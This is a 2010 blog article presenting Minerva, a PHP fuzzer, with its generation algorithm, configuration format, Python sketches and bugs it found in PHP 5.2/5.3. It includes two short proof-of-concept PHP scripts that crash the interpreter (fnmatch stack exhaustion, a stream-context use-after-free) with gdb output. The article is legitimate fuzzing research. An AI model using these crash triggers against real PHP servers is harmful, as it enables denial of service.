MOPS Submission 05 – The Minerva PHP Fuzzer

May 11th, 2010

Today it is time for the fifth external MOPS submission. It is the second submission by Mateusz Kocielski, an article about his PHP fuzzer called Minerva.

Minerva – 1.0

Mateusz Kocielski

Table of contents:

  1. Introduction
  2. Minerva
  3. Future work
  4. Appendix

-[ 1. Introduction

-[[ 1 a) Abstract

Minerva is a PHP fuzzer designed to uncover bugs in PHP internals. This document describes its construction and fuzzing approach, as well as the bugs discovered and future work.

-[[ 1 b) Background

Minerva is a fuzzer dedicated to the PHP language. Fuzz testing, in brief, is a software testing technique that feeds random or invalid data to a program and then checks whether the program failed or something unexpected happened. The technique was proposed 20 years ago by Prof. Barton Miller, who noticed that many UNIX utilities crash when given random data as input. Historical background on fuzzing can be found at Miller's website [miller]. Over the years fuzz testing has evolved: many techniques have been proposed and a lot of software has been released. It is now a valid tool for both developers and hackers to discover bugs in software. The important thing to understand is that fuzzing is not a substitute for testing, but it can be a notable complement to it.

Minerva is not the first fuzzing tool dedicated to PHP; some work has been done already. Victor Steiner [steiner] released a PHP fuzzer as part of a bigger project, the fusil fuzzing framework [fusil]. His approach was to pass random arguments to random functions; a similar line of reasoning was presented by Lilxam [lilxam]. Passing random arguments to random functions is ineffective because PHP cares about types. With these fuzzers many function calls fail at the very beginning because of bad argument types or a wrong number of arguments. In 2007 Calcite released PFF (PHP Fuzzing Framework) [pff].

PFF is configured by a template file in which the user specifies the function name and a list of types (string, integer, or random, meaning that either an integer or a string will be chosen). Based on that file, PFF generates random function calls for PHP. All of these fuzzers discovered bugs in the PHP interpreter. Minerva's approach is to generate valid PHP scripts with a fixed number of function calls. Validity here should be understood as passing "almost correct" arguments to the functions. The code has "proof of concept" status and should be regarded as material for future research and development.

-[ 2. Minerva

-[[ 2 a) Description

As mentioned before, Minerva is based on the observation that passing random arguments to PHP functions is highly inefficient, because in most cases it ends with a type error. A better approach is to take the types into account and generate scripts with "almost correct" arguments. Minerva has a predefined set of initial variables as well as a database of functions with their return types and argument types. The core algorithm is simple and can be described by the following pseudo-code:

1.  script <- ""
2.  X <- Initial set of variables with their types
3.  G <- Fresh variable generator
4.  F <- Function database
5.  for i in 1..n:
6.   f <- GET_RANDOM(F, X)
7.   v <- G()
8.   X <- X u <v, f result type>
9.   script <- script . v . " = " . f call with random arguments from X (but
     with proper types)
10. return script
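
The pseudo-code above can be sketched in Python roughly as follows. This is only an illustration of the idea, not Minerva's actual code: the function database, the initial variables, and the names FUNCTIONS, INITIAL_VARS, callable_functions and generate are all assumptions made for this example.

```python
import random

# Hypothetical function database: name -> (return type, argument types).
# These entries are illustrative and are not taken from Minerva's database.
FUNCTIONS = {
    "str_repeat": ("string", ["string", "int"]),
    "strlen": ("int", ["string"]),
    "strrev": ("string", ["string"]),
    "abs": ("int", ["int"]),
}

# Hypothetical initial variables: PHP variable -> (type, initialiser).
INITIAL_VARS = {
    "$s0": ("string", '"AAAA"'),
    "$i0": ("int", "16"),
}


def callable_functions(functions, variables):
    """Names of functions whose every argument type is present in variables.

    variables maps a variable name to its type (the set X in the pseudo-code).
    """
    available = set(variables.values())
    return sorted(
        name
        for name, (_ret, args) in functions.items()
        if all(arg in available for arg in args)
    )


def generate(n, seed=None):
    """Build a PHP script body containing n type-correct function calls."""
    rng = random.Random(seed)
    types = {name: typ for name, (typ, _init) in INITIAL_VARS.items()}  # X
    lines = [f"{name} = {init};" for name, (_typ, init) in INITIAL_VARS.items()]
    for i in range(n):
        # GET_RANDOM: pick among functions that X can satisfy.
        fname = rng.choice(callable_functions(FUNCTIONS, types))
        ret, arg_types = FUNCTIONS[fname]
        # Pick a random variable of the proper type for each argument.
        args = [
            rng.choice(sorted(v for v, t in types.items() if t == wanted))
            for wanted in arg_types
        ]
        fresh = f"$v{i}"    # G: fresh variable generator
        types[fresh] = ret  # X <- X u <v, f result type>
        lines.append(f"{fresh} = {fname}({', '.join(args)});")
    return "\n".join(lines)
```

Calling generate(5, seed=1) returns the two initial assignments followed by five calls, each of which only uses variables whose types match the chosen function's signature.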

The function GET_RANDOM from line 6 returns a random function from F whose arguments can be covered by variables from the set X. The initial set of variables is defined in src/ function, but can be extended by providing an init file with a suitable function (e.g. function foo() { return "AAAA"; }) and adding the foo function to the function database. The generated script is divided into the following sections:

 | header            |
 | init              |
 | generated script  |
 .                   .
 .                   .
 |                   |
 | fini              |
 | footer            |
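
The layout above could be assembled along these lines. This is a minimal sketch: the header and footer contents ("<?php" and "?>") and the name assemble are assumptions, since the article does not show what Minerva actually emits in those sections.

```python
def assemble(body, init="", fini=""):
    """Join the script sections in order, skipping empty optional ones."""
    header = "<?php"  # assumed header content
    footer = "?>"     # assumed footer content
    sections = [header, init, body, fini, footer]
    return "\n".join(section for section in sections if section) + "\n"
```

For example, assemble('$a = strlen("AAAA");', init='function foo() { return "AAAA"; }') places the user-supplied init code between the header and the generated calls.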

The header and footer sections are defined by Minerva in the src/ header() and footer() functions. The init and fini sections are optional and can be supplied by the user to add static content (e.g. some additional

-[[ 2 b) Configuration file

The function database and default options can be defined in a configuration file. The configuration file is organized as follows:

main section

 default_length - number of function calls
 default_output - output script filename
 modules - list of modules
 ignore_functions - list of ignored functions
 init - initial file
 fini - fini file

functions section

 module_name = [
   return_type function_name ( arguments_types ),

For syntax details, take a look at the example.conf file in the conf/ directory. Configuration options can also be passed on the command line. For a detailed list, run the program with the "--help" argument.
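
To illustrate how an entry of the form "return_type function_name ( arguments_types )" might be turned into a database record, here is a small sketch. The exact syntax is defined by example.conf, which is not reproduced in this article, so the comma-separated argument list and the name parse_signature are assumptions.

```python
import re

# One database entry, e.g. "string str_repeat ( string, int ),".
# Assumption: argument types are separated by commas.
SIGNATURE = re.compile(r"^\s*(\w+)\s+(\w+)\s*\(\s*([^)]*?)\s*\)\s*,?\s*$")


def parse_signature(line):
    """Return (function name, return type, list of argument types)."""
    match = SIGNATURE.match(line)
    if match is None:
        raise ValueError(f"not a function signature: {line!r}")
    return_type, name, raw_args = match.groups()
    arg_types = [arg.strip() for arg in raw_args.split(",") if arg.strip()]
    return name, return_type, arg_types
```

Under these assumptions, parse_signature("string str_repeat ( string, int ),") yields the name "str_repeat", the return type "string" and the argument types ["string", "int"].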

-[[ 2 c) Discovered bugs

This section presents Minerva's results for PHP 5.3.2 and 5.2.13. The testing environment is not described, to encourage future users to experiment with Minerva. The tests presented here focused on crashing the PHP interpreter: if it was terminated by SIGSEGV, the script file was kept for further research. During a few hours of testing the standard modules, the following bugs were discovered:

fnmatch() - stack exhaustion caused by the glibc function fnmatch. It does not seem to be exploitable, but may be used to crash PHP remotely.

Proof of concept code:

     $a57 = str_repeat("A",16000000);
     $a265 = fnmatch($a57,"");

  $ php -v
  PHP 5.2.6-1+lenny8 with Suhosin-Patch (cli) (built: Mar 14 2010 08:14:04)
  Copyright (c) 1997-2008 The PHP Group
  Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies

  (gdb) r file.php
  Starting program: /usr/bin/php file.php
  [Thread debugging using libthread_db enabled]

  Program received signal SIGSEGV, Segmentation fault.
  0xb7a7bb0b in fnmatch () from /lib/i686/cmov/

Freeing context before freeing stream - During php_request_shutdown() (main/main.c) the context structure assigned to a stream is freed before the stream structure itself is freed. If the memory that was allocated for the context is dirty, this may cause a crash. This bug may be exploitable and needs more research.

Proof of concept:

     $blah = fopen('/dev/zero','a');
     $arr = array();
     for ( $i = 0 ; $i < 5000 ; $i++ ) {
       $arr[$i] = "";
     }
     $a88 = fread($blah,100000000000);

  $ php -v
  PHP 5.2.6-1+lenny8 with Suhosin-Patch (cli) (built: Mar 14 2010 08:14:04)
  Copyright (c) 1997-2008 The PHP Group
  Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies

  (gdb) r file.php
  Starting program: /usr/bin/php file.php
  [Thread debugging using libthread_db enabled]

  Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 1215752193 bytes) in /thanks/to/dft/test.php on line 8

  Program received signal SIGSEGV, Segmentation fault.
  0x0829ed83 in php_stream_context_del_link ()
  (gdb) bt
  #0  0x0829ed83 in php_stream_context_del_link ()
  #1  0x082a05c1 in _php_stream_free ()

Uninitialized memory in the sqlite extension - this bug, as well as its exploitation, is described in detail in an article which can be found in doc/sqlite.txt.
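
The crash check described at the start of this section (keep the script if the interpreter dies with SIGSEGV) can be sketched as follows. This is an illustration for POSIX systems only and not Minerva's own harness; the names crashed_with_sigsegv and triage, the timeout, and the assumption that the interpreter is invoked as "php" are all made up for this example.

```python
import shutil
import signal
import subprocess


def crashed_with_sigsegv(command, timeout=60):
    """Run command and report whether it was killed by SIGSEGV (POSIX only)."""
    try:
        result = subprocess.run(
            command,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
            timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        # A hang is not a crash; treat it as "no SIGSEGV".
        return False
    # On POSIX a negative return code -N means "terminated by signal N".
    return result.returncode == -signal.SIGSEGV


def triage(script_path, crash_dir, php="php"):
    """Copy script_path into crash_dir if the interpreter segfaults on it."""
    if crashed_with_sigsegv([php, script_path]):
        shutil.copy(script_path, crash_dir)
        return True
    return False
```

A fuzzing loop would call triage() on every generated script and later inspect the saved files under gdb, as in the sessions shown above.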

-[ 3. Future work

For now Minerva is limited to the PHP language, but the approach can also bring good results for other scripting languages such as Python or Perl, as well as for testing syscalls. Supporting more targets shouldn't be hard, but it requires Minerva to be more flexible. Minerva will therefore possibly be redesigned and rewritten in OCaml, and continued as a long-term project.

In the case of PHP there is still much work to do. Some modules need certain conditions to be satisfied, such as a valid FTP server in the case of the ftp module. Minerva currently supports only those modules that can be fuzzed without third-party software. The second issue is that the project almost ignores the fact that PHP is an object-oriented language; a random class generator could be beneficial. It might include features such as inheritance or method overriding.

Some metrics can help to improve Minerva's efficiency. A good option is to measure how much of the PHP code is covered, which can be done using gcov [gcov], and then apply some strategy (e.g. evolutionary) to cover more code.

Detecting bugs by waiting for SIGSEGV is a somewhat naive method; the project could benefit from -fmudflap or other dynamic analysis tools to uncover more bugs. Research in that field needs to be done in order to increase project

If you would like to help, or just have an idea, comment or suggestion, please feel free to contact me.

-[ A. Licence

The Minerva project is released under the BEER-WARE license.

wrote this file. As long as you retain this notice you can do whatever you want with this stuff. If we meet some day, and you think this stuff is worth it, you can buy me a beer in return.

Borrowed from

-[ B. Contact

You can reach me at:

IRC: shm@freenode

-[ C. References:

[miller] Miller’s site on fuzzing
[pff] PHP Fuzzing Framework
[lilxam] Article in French about PHP fuzzing

-[ D. Further reading material:

  • briefly about fuzzing
  • more on fuzzing
  • fusil fuzzer, written in Python, supporting PHP fuzzing
  • digital dwarf fuzzers collection
  • Fuzzing – Breaking software in an automated fashion

-[ E. Greetings:

I would like to thank very much following people for their contribution:

  • Katabu for proof-reading and patience
  • Snooty for proof-reading and feedback
  • dft-labs for providing me testing environment

-[ F. Download:

